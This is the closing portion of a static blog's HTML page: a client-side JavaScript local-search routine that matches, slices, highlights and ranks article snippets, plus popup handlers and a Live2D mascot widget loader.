            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
